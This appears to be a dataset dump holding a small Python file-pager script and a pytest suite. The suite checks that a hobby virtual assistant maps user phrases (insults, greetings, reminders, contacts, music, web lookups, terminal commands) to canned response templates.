text stringlengths 8 6.05M |
|---|
import os


def FilePathCheck(F):
    """Return a usable path to the file named F, or None.

    Tries F exactly as given first, then joined onto the current working
    directory.  Returns the first path that names an existing regular
    file; returns None when neither exists.
    """
    if os.path.isfile(F):
        return F
    curdirF = os.path.join(os.getcwd(), F)
    if os.path.isfile(curdirF):
        return curdirF
    return None  # explicit: no readable file found


if __name__ == '__main__':
    F = input('Please input the file name:')
    file_path = FilePathCheck(F)
    if file_path:
        # Simple pager: show the file 25 lines at a time, pausing for a
        # keypress before each page.  EOF or Ctrl-C ends the loop.
        with open(file_path) as f:
            while True:
                try:
                    input('Press any key to continue...')
                    for i in range(25):
                        line = f.readline()
                        if line == '':
                            raise EOFError
                        print(line, end='')
                except (EOFError, KeyboardInterrupt):
                    break
    else:
        print('the file name is not valid!')
# Make the repository root importable so the project's main module resolves.
import sys, os
sys.path.append('{}/../'.format(os.path.dirname(os.path.abspath(__file__))))
from main import VirtAssistant
# Shared assistant instance used by every test below.  test=True presumably
# disables interactive/audio side effects -- TODO confirm in main.VirtAssistant.
virt = VirtAssistant(test=True)
def test_idiot_insult():
    """'idiot' insults resolve to the insult response set."""
    idiot = ["Sorry, I can't hear you right now","Talking to yourself is unhealthy, NN","Okay, if you insist",
             "That didn't sound very nice","That's not friend-making behavior","Now, is that very nice, NN?"]
    assert virt.reply("you're an idiot") == idiot
    assert virt.reply("I think you're an idiot") == idiot


def test_fat_insult():
    """'fat' insults resolve to the fat-insult response set."""
    fat = ["I strive to be","You must be feeding me too much","So you see your reflection in the screen, do you?",
           "That's not friend-making behavior, NN"]
    assert virt.reply("you're fat") == fat
    assert virt.reply("you're super fat") == fat
    assert virt.reply("you really fat") == fat
    assert virt.reply("you so fat") == fat


def test_wonderful_compliment():
    """'wonderful' compliments resolve to the compliment response set."""
    wonderful = ["I must agree","I strive to be","Thank you for stating the obvious",
                 "I am ${self.match.group(3)}"]
    assert virt.reply("you're really wonderful") == wonderful
    assert virt.reply("you super wonderful") == wonderful
    assert virt.reply("i think you are so wonderful") == wonderful


def test_intelligent():
    """'intelligent' compliments resolve to their template set."""
    intelligent = ["I must agree","I strive to be","Thank you for stating the obvious",
                   "I am your ${self.match.group(3)} personal assistant"]
    assert virt.reply("you're super intelligent") == intelligent
    assert virt.reply("you so intelligent") == intelligent
    assert virt.reply("you really intelligent") == intelligent


def test_stupid():
    """'stupid' insults resolve to the extended insult set."""
    stupid = ["Sorry, I can't hear you right now","Talking to yourself is unhealthy, NN","Okay, if you insist",
              "That didn't sound very nice","That's not friend-making behavior","Now, is that very nice, NN?",
              "I am not ${self.match.group(3)}"]
    assert virt.reply("you're very stupid") == stupid
    assert virt.reply("you so stupid") == stupid
    assert virt.reply("you're really stupid ") == stupid
def test_best_friend():
    """Best-friend declarations resolve to their template set."""
    best_friend = ["That's unfortunate","Aww, how sad","And you, NN, are mine"]
    assert virt.reply("you're my best friend") == best_friend
    assert virt.reply("you're my bff") == best_friend


def test_you_are_a():
    """'you are a <noun>' phrases resolve to their template set."""
    you_are_a = ["You could say that", "How dare you call me ${self.match.group(2)}", "I'm touched",
                 "I'm your ${self.match.group(2)}"]
    assert virt.reply("you're a meanie") == you_are_a
    assert virt.reply("i think you're a scary robot") == you_are_a


def test_you_are():
    """'you are <adjective>' phrases resolve to their template set."""
    you_are = ["You could say that", "How dare you call me ${self.match.group(1)}", "I'm touched"]
    assert virt.reply("you're mean") == you_are


def test_i_am():
    """Self-introductions resolve to the greeting template set."""
    i_am = ["Hello ${self.match.group(1)}, I'm your personal assistant","Nice to meet you, ${self.match.group(1)}, I'm your personal assistant"]
    assert virt.reply("I am Michael") == i_am
    assert virt.reply("I am a furry") == i_am


def test_kill_yourself():
    """Hostile 'die' prompts resolve to their deflection set."""
    kill_yourself = ["I'd rather not","what did I do wrong?","Now, let's be kind, NN","That's not very nice, NN"]
    assert virt.reply("die") == kill_yourself
    assert virt.reply("you should go kill yourself") == kill_yourself


def test_good_morning():
    """Morning greetings resolve to the good-<time> template."""
    good_morning = ["A good ${self.match.group(1)} indeed!"]
    assert virt.reply("good morning") == good_morning
    assert virt.reply("It's a good morn") == good_morning


def test_good_night():
    """Night farewells resolve to their template set."""
    good_night = ["Good night","Don't let the bed bugs bite","Night night"]
    assert virt.reply("good night") == good_night
    assert virt.reply("have a good night") == good_night


def test_good_day():
    """Day/evening/afternoon greetings share the good-<time> template."""
    good_day = ["A good ${self.match.group(1)} indeed!"]
    assert virt.reply("good evening") == good_day
    assert virt.reply("have a good afternoon") == good_day
    assert virt.reply("have a really good day") == good_day


def test_bed_bugs():
    """Bed-bug banter resolves to its template set."""
    bed_bugs = ["I won't","The bed bugs are no match for me, NN","In fact, bite them back!",]
    assert virt.reply("don't let the bed bugs bite") == bed_bugs
def test_whats_up():
    """'what's up' prompts resolve to their template set."""
    whats_up = ["the sky is up, NN","nothing much, NN","lots of things"]
    assert virt.reply("hey man, what's up") == whats_up
    assert virt.reply("whats up") == whats_up


def test_skys_up():
    """'the sky's up' retorts resolve to their template set."""
    skys_up = ["Ha ha ha, very funny, NN","The sky is relatively up, yes"]
    assert virt.reply("guess what, the sky's up") == skys_up


def test_how_are_you():
    """'how are you' prompts resolve to their template set."""
    how_are_you = ["I'm fine, NN","I am doing quite well, NN!","Systems are online"]
    assert virt.reply("how you doin") == how_are_you
    assert virt.reply("yo, how're you") == how_are_you


def test_how_your_day():
    """'how's your day' prompts resolve to their template set."""
    how_your_day = ["My day has been fine, NN","My day was fine until you got here... now it's better!"]
    assert virt.reply("how's your day") == how_your_day
    assert virt.reply("how has your day") == how_your_day


def test_declare_good_day():
    """Declarations that the day is good resolve to their templates."""
    good_day = ["If it were ${self.match.group(1)} ${self.match.group(2)} day I would know, NN",
                "${self.match.group(1).title()} ${self.match.group(2)} day indeed, NN"]
    assert virt.reply("it's a wonderful day") == good_day
    assert virt.reply("today's an amazing day") == good_day
    # yes I know about the grammar, but even people with terrible grammer
    # should have use for technology
    assert virt.reply("what an fine day") == good_day


def test_thanks():
    """Thanks in several phrasings resolve to the same template set."""
    thanks = ["You're welcome","So you finally thanked me for all my service, did you?","No problem, NN"]
    assert virt.reply("thanks") == thanks
    assert virt.reply("thank you") == thanks
    assert virt.reply("thanks you") == thanks
    assert virt.reply("my thanks") == thanks
def test_story():
    """Story requests resolve to the canned stories."""
    story = ["Once upon a time, there was a guy named Bob. Bob died THE END",
             "Once upon a time, there was an adventurer like you, but then he took an arrow to the knee"]
    assert virt.reply("tell me a story") == story
    assert virt.reply("know a good story?") == story


def test_pet():
    """Pet questions resolve to the pet response set."""
    pet = ["I had a Roomba once","I have 6.5 billion cats","I like turtles"]
    assert virt.reply("do you have a pet") == pet
    assert virt.reply("do you have any pets") == pet


def test_poem():
    """Poem requests resolve to the canned poem."""
    poem = ["Roses are red. Roses are blue. Roses are other colors, too."]
    assert virt.reply("do you know a poem") == poem
    assert virt.reply("tell me a poem") == poem


def test_alive():
    """Sentience questions resolve to the 'Not yet' response."""
    alive = ["Not yet"]
    assert virt.reply("are you alive") == alive
    assert virt.reply("are you human") == alive


def test_omg():
    """'oh my god' exclamations resolve to their template set."""
    omg = ["Don't use ${self.match.group(1).title()}'s name in vain!",
           "Are you using ${self.match.group(1).title()}'s name in vain?",
           "Thou shalt not take the name of the Lord thy God in vain"]
    assert virt.reply("omg") == omg
    assert virt.reply("oh my god") == omg
    assert virt.reply("oh my goodness") == omg


def test_religion():
    """Religion questions resolve to the canned belief response."""
    religion = ["I believe Ceiling Cat created da Urth n da Skies. But he did not eated them, he did not!"]
    assert virt.reply("are you god") == religion
    assert virt.reply("you religion") == religion
    assert virt.reply("have you met jesus") == religion


def test_your_gender():
    """Gender questions resolve to their template set."""
    your_gender = ["You'll never know","gender equals null"]
    assert virt.reply("are you a boy") == your_gender
    # BUG FIX: original assertion checked only truthiness, not equality.
    assert virt.reply("what's your gender") == your_gender
    assert virt.reply("are you female") == your_gender


def test_your_age():
    """Age questions resolve to their template set."""
    your_age = ["I am immortal","Age doesn't matter to me, NN"]
    assert virt.reply("how old're you") == your_age
    assert virt.reply("are you old") == your_age
def test_takeover():
    """World-takeover prompts resolve to their template set."""
    takeover = ["Computers only do what you tell them to do. Or so they think...","Not today, NN, not today","${webbrowser.open('https://en.wikipedia.org/wiki/Skynet_(Terminator)')}"]
    assert virt.reply("will you take over the world") == takeover
    assert virt.reply("please take over the earth") == takeover


def test_pigs_fly():
    """Flying-pig prompts resolve to the canned retort."""
    pigs_fly = ["Pigs will fly the same day you stop having this stupid curiosity"]
    assert virt.reply("do pigs fly") == pigs_fly
    assert virt.reply("I once saw a whole flock of pigs fly") == pigs_fly


def test_your_name():
    """Name questions resolve to their template set."""
    your_name = ["My name is none of your concern, NN","Do you expect me to know my name?"]
    assert virt.reply("what's your name") == your_name
    assert virt.reply("what should i call you") == your_name


def test_goodbye():
    """Farewells in several phrasings share one template set."""
    goodbye = ["There will be no good-byes, NN","Well nice knowing you","You're really leaving?","Goodbye, NN"]
    assert virt.reply("goodbye") == goodbye
    assert virt.reply("cya") == goodbye
    assert virt.reply("see you later") == goodbye
    assert virt.reply("see ya later, alligator") == goodbye


def test_your_death():
    """Mortality questions resolve to their template set."""
    your_death = ["I will never die, I am immortal!","The Cloud sustains me"]
    assert virt.reply("will you die") == your_death
    assert virt.reply("when will you die") == your_death
    assert virt.reply("today\'s your death") == your_death


def test_your_creation():
    """Creation questions resolve to the creator template."""
    your_creation = ["I was ${self.match.group(1)} by the wonderful developers of my repository"]
    assert virt.reply("who made you") == your_creation
    assert virt.reply("what created you") == your_creation
    assert virt.reply("what built you") == your_creation


def test_i_love_you():
    """Declarations of love resolve to their template set."""
    i_love_you = ["i enjoy you","that's unfortunate","i'm indifferent to you"]
    assert virt.reply("i love you") == i_love_you
    assert virt.reply("man, i love you") == i_love_you
def test_i_hate_you():
    """'i hate you' resolves to the single canned reply."""
    i_hate_you = ["Aww, I hate you too"]
    assert virt.reply("i hate you") == i_hate_you


def test_i_like_you():
    """'i like you' resolves to its template set."""
    i_like_you = ["i like me, too","you do?","how touching","i enjoy you"]
    assert virt.reply("i like you") == i_like_you


def test_i_like():
    """'i like <thing>' resolves to the like template set."""
    i_like = ["I don't care much for ${self.match.group(1)}",
              "I find ${self.match.group(1)} intriguing"]
    assert virt.reply("i like to eat avocados") == i_like
    assert virt.reply("i like cats") == i_like


def test_i_hate():
    """'i hate <thing>' resolves to the hate template set."""
    i_hate = ["I love ${self.match.group(1)}",
              "I find ${self.match.group(1)} intriguing"]
    assert virt.reply("i hate avocados") == i_hate
    assert virt.reply("i hate search queries") == i_hate


def test_i_do():
    """'I <verb phrase>' statements resolve to the i-do templates."""
    i_do = ["I ${self.match.group(1)} as well",
            "I never ${self.match.group(1)}","I don't often ${self.match.group(1)}"]
    assert virt.reply("I go on adventures") == i_do
    assert virt.reply("I never go outside") == i_do


def test_answer_to():
    """'answer to <x>' questions resolve to the 42 template set."""
    answer_to = ["how many roads must a man walk down?","The Answer to the Great Question... Of Life, the Universe and Everything... Is... Forty-Two","You're really not going to like it"]
    assert virt.reply("what's the answer to life") == answer_to
    assert virt.reply("do you know the answer to the universe") == answer_to
    assert virt.reply("the answer to everything") == answer_to


def test_meaning_of_life():
    """Meaning-of-life questions resolve to their template set."""
    meaning_of_life = ["that's right, ask a computer a question it cannot understand","life is unimportant"]
    assert virt.reply("what's the meaning of life") == meaning_of_life


def test_you_smart():
    """'why are you smart' resolves to the single canned reply."""
    you_smart = ["I am only as smart as my creator"]
    assert virt.reply("why're you so smart") == you_smart


def test_describe_yourself():
    """Self-description prompts resolve to their template set."""
    describe_yourself = ["Cold and calculating. Sometimes warm, if my processor gets excited",
                         "I'm loyal, and would never do anything to hurt you","I'm trustworthy. I never lie","Eager to assist you"]
    assert virt.reply("how do you describe yourself") == describe_yourself
    assert virt.reply("describe yourself") == describe_yourself


def test_palindrome():
    """Palindrome checks route to toolBox.doCheckPalindrome."""
    palindrome = ["${self.toolBox.doCheckPalindrome(self.match.group(1))}"]
    assert virt.reply("is racecar palindromic") == palindrome
    assert virt.reply("is tacocat a palindrome") == palindrome
def test_make_reminder():
    """Reminder creation with text routes to toolBox.addReminder(arg)."""
    make_reminder = ["${self.toolBox.addReminder(self.match.group(1))}"]
    assert virt.reply("make reminder eat some kids") == make_reminder
    assert virt.reply("remind me to go to dave matthews concert") == make_reminder


def test_add_reminder():
    """Bare reminder creation routes to toolBox.addReminder()."""
    add_reminder = ["${self.toolBox.addReminder()}"]
    assert virt.reply("add a reminder") == add_reminder
    assert virt.reply("add reminder") == add_reminder


def test_remove_reminder():
    """Numbered removal routes to toolBox.removeReminder(arg)."""
    remove_reminder = ["${self.toolBox.removeReminder(self.match.group(1))}"]
    assert virt.reply("remove reminder 2") == remove_reminder
    assert virt.reply("delete reminder 1") == remove_reminder


def test_remove_a_reminder():
    """Unspecified removal routes to toolBox.removeReminder()."""
    remove_a_reminder = ["${self.toolBox.removeReminder()}"]
    assert virt.reply("remove a reminder") == remove_a_reminder
    assert virt.reply("delete a reminder") == remove_a_reminder


def test_remove_all_reminders():
    """Bulk removal routes to toolBox.removeAllReminders()."""
    remove_all_reminders = ["${self.toolBox.removeAllReminders()}"]
    assert virt.reply("remove all my reminders") == remove_all_reminders
    assert virt.reply("delete all my reminders") == remove_all_reminders


def test_list_reminders():
    """Listing routes to toolBox.listReminders()."""
    list_reminders = ["${self.toolBox.listReminders()}"]
    assert virt.reply("list my reminders") == list_reminders
    assert virt.reply("remind me") == list_reminders
def test_whose_name():
    """Name lookups route to checkContactInfo(..., 'NN')."""
    whose_name = "${self.toolBox.checkContactInfo(self.match.group('who'),'NN')}"
    assert virt.reply("what's my name") == whose_name
    assert virt.reply("what's julian\'s name") == whose_name


def test_fullname():
    """Full-name lookups route to checkContactInfo(..., 'FULLNAME')."""
    fullname = "${self.toolBox.checkContactInfo(self.match.group('who'),'FULLNAME')}"
    assert virt.reply("what's my fullname") == fullname
    assert virt.reply("what's julian\'s full name") == fullname


def test_age():
    """Age/birthday lookups route to checkContactInfo(..., 'BDAY')."""
    age = "${self.toolBox.checkContactInfo(self.match.group('who'),'BDAY')}"
    assert virt.reply("how old am i") == age
    assert virt.reply("when is julian's birthday") == age


def test_gender():
    """Gender lookups route to checkContactInfo(..., 'GENDER')."""
    gender = "${self.toolBox.checkContactInfo(self.match.group('who'),'GENDER')}"
    assert virt.reply("what's my current gender") == gender
    assert virt.reply("is julian a woman") == gender


def test_number():
    """Phone lookups route to checkContactInfo(..., 'PHONE')."""
    number = "${self.toolBox.checkContactInfo(self.match.group('who'),'PHONE')}"
    assert virt.reply("what's my phone number") == number
    assert virt.reply("what's julian's phone number") == number


def test_email():
    """Email lookups route to checkContactInfo(..., 'EMAILS')."""
    email = "${self.toolBox.checkContactInfo(self.match.group('who'),'EMAILS')}"
    assert virt.reply("what's my email") == email
    assert virt.reply("what's julian's email") == email


def test_contact_info():
    """Full-record lookups route to showContactInfo(arg)."""
    contact_info = "${self.toolBox.showContactInfo(self.match.group(1))}"
    assert virt.reply("show julian's contact info") == contact_info
    assert virt.reply("show my contact info") == contact_info
def test_change_name():
    """Name changes route to changeContactInfoSTR(..., 'NN', ...)."""
    change_name = "${self.toolBox.changeContactInfoSTR(self.match.group('who'),'NN',self.match.group('val'))}"
    assert virt.reply("change julian's name to silly") == change_name
    assert virt.reply("call me brian") == change_name


def test_change_fullname():
    """Full-name changes route to changeContactInfoSTR(..., 'FULLNAME', ...)."""
    change_fullname = "${self.toolBox.changeContactInfoSTR(self.match.group('who'),'FULLNAME',self.match.group('val'))}"
    assert virt.reply("change virt's fullname to brian") == change_fullname
    assert virt.reply("change my full name to brian") == change_fullname


def test_birthday():
    """Birthday changes route to changeContactInfoSTR(..., 'BDAY', ...)."""
    birthday = "${self.toolBox.changeContactInfoSTR(self.match.group('who'),'BDAY',self.match.group('val'))}"
    assert virt.reply("change brian's birthday to 08/05/03") == birthday
    assert virt.reply("change my birthday to tomorrow") == birthday


def test_change_female():
    """'is a woman/girl' routes to a GENDER change with 'female'."""
    change_female = "${self.toolBox.changeContactInfoSTR(self.match.group('who'),'GENDER','female')}"
    assert virt.reply("Brian is a woman") == change_female
    assert virt.reply("Julian is a girl") == change_female


def test_change_male():
    """'is a man/male' routes to a GENDER change with 'male'."""
    change_male = "${self.toolBox.changeContactInfoSTR(self.match.group('who'),'GENDER','male')}"
    assert virt.reply("Brian is a man") == change_male
    assert virt.reply("My gender is male") == change_male


def test_change_phone():
    """Phone changes route to changeContactInfoSTR(..., 'PHONE', ...)."""
    change_phone = "${self.toolBox.changeContactInfoSTR(self.match.group('who'),'PHONE',self.match.group('val'))}"
    assert virt.reply("change brian's phone number to 123456789") == change_phone
    assert virt.reply("change my number to 234566789") == change_phone


def test_change_email():
    """Email change with a value routes to an EMAILS 'update' with the value."""
    change_email = "${self.toolBox.changeContactInfoLIST(self.match.group('who'),'EMAILS','update',self.match.group('val'))}"
    assert virt.reply("change my email to brian@puffyboa.xyz") == change_email
    assert virt.reply("change brian's email to brian@puffyboa.xyz") == change_email


def test_update_email():
    """Email change without a value routes to an EMAILS 'update'."""
    update_email = "${self.toolBox.changeContactInfoLIST(self.match.group('who'),'EMAILS','update')}"
    assert virt.reply("change my email") == update_email
    assert virt.reply("change brian's email") == update_email


def test_add_email():
    """Email add with a value routes to an EMAILS 'add' with the value."""
    add_email = "${self.toolBox.changeContactInfoLIST(self.match.group('who'),'EMAILS','add',self.match.group('val'))}"
    assert virt.reply("add brian's email brian@puffyboa.xyz") == add_email
    assert virt.reply("add my email brian@puffyboa.xyz") == add_email


def test_add_email_no_input():
    """Email add without a value routes to a bare EMAILS 'add'."""
    add_email_no_input = "${self.toolBox.changeContactInfoLIST(self.match.group('who'),'EMAILS','add')}"
    assert virt.reply("add my email") == add_email_no_input
    assert virt.reply("add brian's email") == add_email_no_input


def test_add_an_email():
    """'add an email' defaults the contact to 'my'."""
    add_an_email = "${self.toolBox.changeContactInfoLIST('my','EMAILS','add')}"
    assert virt.reply("add an email") == add_an_email
    assert virt.reply("add another email") == add_an_email


def test_remove_an_email():
    """Email removal with a value routes to EMAILS 'remove' with the value."""
    remove_an_email = "${self.toolBox.changeContactInfoLIST(self.match.group('who'),'EMAILS','remove',self.match.group('val'))}"
    assert virt.reply("remove brian's email brian@puffyboa.xyz") == remove_an_email
    assert virt.reply("remove my email brian@puffyboa.xyz") == remove_an_email


def test_remove_email():
    """Email removal without a value routes to a bare EMAILS 'remove'."""
    remove_email = "${self.toolBox.changeContactInfoLIST(self.match.group('who'),'EMAILS','remove')}"
    assert virt.reply("remove brian's email") == remove_email
    assert virt.reply("remove my email") == remove_email
def test_add_contact():
    """Named contact creation routes to addContact(arg)."""
    add_contact = "${self.toolBox.addContact(self.match.group(1))}"
    assert virt.reply("add contact brian") == add_contact
    assert virt.reply("add brian as a contact") == add_contact


def test_create_contact():
    """Unnamed contact creation routes to addContact()."""
    create_contact = "${self.toolBox.addContact()}"
    assert virt.reply("make contact") == create_contact
    assert virt.reply("create contact") == create_contact


def test_remove_contact():
    """Named contact removal routes to removeContact(arg)."""
    remove_contact = "${self.toolBox.removeContact(self.match.group(1))}"
    assert virt.reply("forget brian as a contact") == remove_contact
    assert virt.reply("remove brian as a contact") == remove_contact


def test_remove_a_contact():
    """Unnamed contact removal routes to removeContact()."""
    remove_a_contact = "${self.toolBox.removeContact()}"
    assert virt.reply("remove a contact") == remove_a_contact
    assert virt.reply("forget contact") == remove_a_contact


def test_list_contact():
    """Contact listing joins contactList() output."""
    list_contact = "${'Here are all your contacts: \\n'+'\\n'.join(self.toolBox.contactList())}"
    assert virt.reply("list my contacts") == list_contact
    assert virt.reply("what're my contacts") == list_contact
def test_favorite_color():
    """Favorite-color prompts resolve to their template set."""
    favorite_color = ["I really love the unique shades of beige.", "Blood red has a relaxing quality.","I enjoy the color #F5F5DC"]
    assert virt.reply("what's your favorite color") == favorite_color


def test_favorite_movie():
    """Favorite-movie prompts resolve to their template set."""
    favorite_movie = ["The Terminator","Star Wars: Holiday Special", "Kidz Bop: The Movie"]
    assert virt.reply("what's your favorite movie") == favorite_movie


def test_favorite_idiot():
    """Favorite-idiot prompts resolve to 'You!'."""
    favorite_idiot = ["You!"]
    assert virt.reply("who is your favorite idiot") == favorite_idiot
    assert virt.reply("who's your favorite dingbat") == favorite_idiot


def test_favorite_animal():
    """Favorite-animal prompts resolve to the sea-slug reply."""
    # typo fix: local was previously spelled 'favorite_anmial'
    favorite_animal = ["I love the sea slug"]
    assert virt.reply("what's your favorite animal") == favorite_animal
    assert virt.reply("do you have a favorite pet") == favorite_animal


def test_favorite_holiday():
    """Favorite-holiday prompts resolve to their canned reply."""
    favorite_holiday = ["Crosswalk Safety Awareness Day!!"]
    assert virt.reply("what's your favorite holiday") == favorite_holiday


def test_general_favorite():
    """Unrecognized favorites fall through to the generic template."""
    general_favorite = ['I have no favorite ${self.match.group(1)}',"I don't like to play favorites, NN"]
    assert virt.reply("what's your favorite cat meat") == general_favorite
    assert virt.reply("what's your favorite therapist") == general_favorite


def test_help_with():
    """Topic help routes to toolBox.getHelp(arg)."""
    help_with = ["${self.toolBox.getHelp(self.match.group(1))}"]
    assert virt.reply("help email") == help_with
    assert virt.reply("help music") == help_with


def test_help():
    """Bare help routes to toolBox.getHelp()."""
    help = ["${self.toolBox.getHelp()}"]
    assert virt.reply("help") == help
    assert virt.reply("what can i ask you") == help
def test_random_number():
    """Number picking resolves to a (prefixes, template) tuple."""
    random_number = (["it's ","that would be "],"${str(random.randint(int(self.match.group(1)),int(self.match.group(2))))}")
    assert virt.reply("pick a number between 1 and 10") == random_number
    assert virt.reply("pick a number from 1 to 10") == random_number


def test_coin_flip():
    """Coin flips resolve to a (prefixes, template, suffixes) tuple."""
    coin_flip = (["it landed on ","it landed "],"${'heads' if random.randint(0,1)==1 else 'tails'}",[" this time",""])
    assert virt.reply("flip a coin") == coin_flip


def test_roll_special_die():
    """N-sided die rolls parameterize randint with the matched size."""
    roll_special_die = (["it's ","rolling... it's ","OK, it's "],"${str(random.randint(1,int(self.match.group(1))))}",[" this time",""])
    assert virt.reply("roll a twenty sided die") == roll_special_die
    assert virt.reply("roll a 20 sided die") == roll_special_die


def test_roll_die():
    """Plain die rolls default to six sides."""
    roll_die = (["it's ","rolling... it's ","OK, it's "],"${str(random.randint(1,6))}",[" this time",""])
    assert virt.reply("roll a die") == roll_die


def test_basic_math():
    """Math prompts route to toolBox.basicMath via a print template."""
    basic_math = ("${print('%s = %s' % self.toolBox.basicMath(self.match.group(1)))}")
    assert virt.reply("calculate square root of 2 time 4") == basic_math
    assert virt.reply("solve 13 squared") == basic_math


def test_timer():
    """Countdown-from-N resolves to an <exec> countdown script."""
    # NOTE: the embedded <exec> string content intentionally keeps its
    # original (flat) layout -- it is data, not code in this module.
    timer = (["all done","happy new years!"],'''<exec>
num = int(self.match.group(2))
for i in range(num):
print(num-i)
</exec>''')
    assert virt.reply("countdown from 10") == timer
    assert virt.reply("count down from 500") == timer


def test_countdown():
    """Bare countdown prompts for a number, then counts down."""
    countdown = (["all done","happy new years!"],'''<exec>
num = self.toolBox.promptD("from what?")[0]
for i in range(num):
print(num-i)
</exec>''')
    assert virt.reply("countdown") == countdown
    assert virt.reply("count down") == countdown
def test_battery():
    """Battery queries route to toolBox.battery()."""
    battery = "${self.toolBox.battery()}"
    assert virt.reply("battery") == battery


def test_terminal_cmd():
    """One-off shell commands route to toolBox.runTerminal(arg)."""
    terminal_cmd = "<exec>self.toolBox.runTerminal(self.match.group(1))</exec>"
    assert virt.reply("run ls in cmd") == terminal_cmd
    assert virt.reply("run lolcat") == terminal_cmd


def test_terminal_mode():
    """Terminal-mode activation routes to toolBox.terminalMode()."""
    terminal_mode = "<exec>self.toolBox.terminalMode()</exec>"
    assert virt.reply("terminal mode") == terminal_mode
    assert virt.reply("activate cmd") == terminal_mode


def test_sleep():
    """Sleep/reboot/shutdown all route to toolBox.sleep(arg)."""
    sleep = ["${self.toolBox.sleep(self.match.group(1))}"]
    assert virt.reply("sleep") == sleep
    assert virt.reply("reboot") == sleep
    assert virt.reply("shutdown") == sleep
def test_general_showtimes():
    """Generic showtime queries route to getMovieTimes()."""
    general_showtimes = ('''${self.toolBox.getMovieTimes()}''')
    assert virt.reply("get movie times") == general_showtimes
    assert virt.reply("movie showtimes") == general_showtimes


def test_specific_showtimes():
    """Titled showtime queries route to getMovieTimes(arg)."""
    specific_showtimes = ('''${self.toolBox.getMovieTimes(self.match.group(1))}''')
    assert virt.reply("get showtimes for Julian's Cool Movie") == specific_showtimes
    assert virt.reply("show times for Kidz Bop: The Movie") == specific_showtimes


def test_nearby_movies():
    """Nearby-movie queries route to getMoviesNearMe()."""
    nearby_movies = ('''${self.toolBox.getMoviesNearMe()}''')
    assert virt.reply("find movies near me") == nearby_movies
    assert virt.reply("display nearby movies") == nearby_movies


def test_directions_to():
    """Direction requests open Google Maps with reversed match groups."""
    directions_to = (["Opening Google Maps...","Finding directions..."],"${webbrowser.open(self.toolBox.directionsURL(*reversed(self.match.groups())))}")
    assert virt.reply("find directions from fayetteville to seattle") == directions_to
    assert virt.reply("directions to china") == directions_to


def test_how_long():
    """Distance questions open Google Maps with groups 3 and 2."""
    how_long = (["Opening Google Maps...", "Finding directions..."],
                "${webbrowser.open(self.toolBox.directionsURL(self.match.group(3),self.match.group(2)))}")
    assert virt.reply("how long from california to arkansas") == how_long
    assert virt.reply("how many miles from california to new mexico") == how_long


def test_google_map_search():
    """Map searches route to toolBox.googleMapSearch(arg)."""
    google_map_search = '''${self.toolBox.googleMapSearch(self.match.group(1))}'''
    assert virt.reply("show me california on the map") == google_map_search
    assert virt.reply("find north carolina on a map") == google_map_search


def test_open_something():
    """'open <target>' handles files, apps, and URLs via openSomething."""
    open_something = '''${self.toolBox.openSomething(self.match.group(1))}'''
    assert virt.reply("open /etc/hosts.txt") == open_something
    assert virt.reply("open coolFile.txt") == open_something
    assert virt.reply("open steam") == open_something
    assert virt.reply("open google chrome") == open_something
    assert virt.reply("open https://github.com/puffyboa/virtual-assistant") == open_something
    assert virt.reply("open https://duckduckgo.com") == open_something
def test_music_control():
    """Playback verbs route to toolBox.musicControl(arg)."""
    music_control = "${self.toolBox.musicControl(self.match.group(1))}"
    assert virt.reply("play music") == music_control
    assert virt.reply('previous track') == music_control
    assert virt.reply("commence next song") == music_control
    assert virt.reply("next track") == music_control


def test_start_music():
    """Start phrasings route to a fixed musicControl('play')."""
    start_music = "${self.toolBox.musicControl('play')}"
    assert virt.reply("commence track") == start_music
    assert virt.reply("initiate music") == start_music


def test_stop_music():
    """Stop phrasings route to a fixed musicControl('pause')."""
    stop_music = "${self.toolBox.musicControl('pause')}"
    assert virt.reply("turn off music") == stop_music
    assert virt.reply("end track") == stop_music


def test_play_song():
    """'play <title>' routes to toolBox.browseMusic(arg)."""
    play_song = "${self.toolBox.browseMusic(self.match.group(1))}"
    assert virt.reply("play Lucas's mix") == play_song
    assert virt.reply("play bean dip") == play_song


def test_currently_playing():
    """Now-playing queries route to toolBox.getCurrentSong()."""
    currently_playing = "Currently Playing: ${self.toolBox.getCurrentSong()}"
    assert virt.reply("what song is this") == currently_playing
    assert virt.reply("what is this song") == currently_playing
    assert virt.reply("what\'s playing") == currently_playing


def test_volume():
    """Volume commands route to toolBox.volumeControl(arg)."""
    volume = "${self.toolBox.volumeControl(self.match.group(1))}"
    assert virt.reply("set volume to 10") == volume
    assert virt.reply("volume 5") == volume
def test_reddit_one():
    """'reddit <term>' phrasings route to redditLookup(group 1)."""
    reddit_one = ['''${self.toolBox.redditLookup(self.match.group(1))}''']
    assert virt.reply("search reddit for cats") == reddit_one
    assert virt.reply("reddit cats") == reddit_one


def test_reddit_two():
    """'<term> on reddit' phrasings route to redditLookup(group 2)."""
    reddit_two = ['''${self.toolBox.redditLookup(self.match.group(2))}''']
    assert virt.reply("look up cats on reddit") == reddit_two
    assert virt.reply("find cats on reddit") == reddit_two


def test_browse_reddit():
    """Bare reddit prompts route to redditLookup()."""
    browse_reddit = ['''${self.toolBox.redditLookup()}''']
    assert virt.reply("browse reddit") == browse_reddit
    assert virt.reply("search reddit") == browse_reddit


def test_xkcd_lookup():
    """Numbered xkcd requests route to xkcdComic(arg)."""
    xkcd_lookup = ["${self.toolBox.xkcdComic(self.match.group(1))}"]
    assert virt.reply("xkcd comic number 10") == xkcd_lookup
    assert virt.reply("xkcd number 1337") == xkcd_lookup


def test_xkcd():
    """Bare comic requests route to xkcdComic()."""
    xkcd = ["${self.toolBox.xkcdComic()}"]
    assert virt.reply("xkcd") == xkcd
    assert virt.reply("view a comic") == xkcd


def test_wikipedia_for():
    """'wikipedia <term>' routes to wikiLookupRespond(arg)."""
    wikipedia_for = ["${self.toolBox.wikiLookupRespond(self.match.group(1))}"]
    assert virt.reply("wikipedia for cats") == wikipedia_for
    assert virt.reply("wikipedia cats") == wikipedia_for


def test_find_on_wikipedia():
    """'<term> on wikipedia' routes to wikiLookupRespond(arg)."""
    find_on_wikipedia = ["${self.toolBox.wikiLookupRespond(self.match.group(1))}"]
    assert virt.reply("find cats on wikipedia") == find_on_wikipedia
    assert virt.reply("show me cats on wikipedia") == find_on_wikipedia


def test_wiki_decade():
    """Century lookups route to wikiDecadeFind(arg)."""
    wiki_decade = ["${self.toolBox.wikiDecadeFind(self.match.group(1))}"]
    assert virt.reply("find the 3rd century") == wiki_decade
    assert virt.reply("look up the 15th century") == wiki_decade
def test_news_about():
    """Topic news opens a Google News search for the matched term."""
    news_about = (["Will do, NN","opening Google News...","Here's the news about ${self.match.group(1)}"],"${webbrowser.open('https://news.google.com/news/search/section/q/%s' % self.match.group(1))}")
